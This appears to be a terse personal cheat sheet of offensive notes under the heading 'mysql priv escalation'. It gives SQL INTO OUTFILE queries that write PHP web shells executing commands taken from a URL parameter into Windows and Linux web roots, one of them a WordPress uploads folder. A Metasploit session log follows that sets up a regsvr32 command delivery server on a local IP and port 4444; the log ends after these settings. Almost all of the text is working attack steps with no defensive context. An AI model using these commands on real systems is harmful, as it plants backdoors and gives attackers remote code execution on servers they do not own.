mysql priv escalation

 For window >>>

SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"

 For Linux 

Select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/https/blogblog/wp-content/uploads/shell.php";

msf6 > search regsvr32

Matching Modules
================

   #  Name                                               Disclosure Date  Rank    Check  Description
   -  ----                                               ---------------  ----    -----  -----------
   0  auxiliary/server/regsvr32_command_delivery_server                   normal  No     Regsvr32.exe (.sct) Command Delivery Server
   1  exploit/multi/script/web_delivery                  2013-07-19       manual  No     Script Web Delivery


Interact with a module by name or index. For example info 1, use 1 or use exploit/multi/script/web_delivery

msf6 > use 0
msf6 auxiliary(server/regsvr32_command_delivery_server) > show options

Module options (auxiliary/server/regsvr32_command_delivery_server):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CMD                       no        The command to execute
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

msf6 auxiliary(server/regsvr32_command_delivery_server) > set SRVHOST 192.168.1.5
SRVHOST => 192.168.1.5
msf6 auxiliary(server/regsvr32_command_delivery_server) > set SRVPORT 4444
SRVPORT => 4444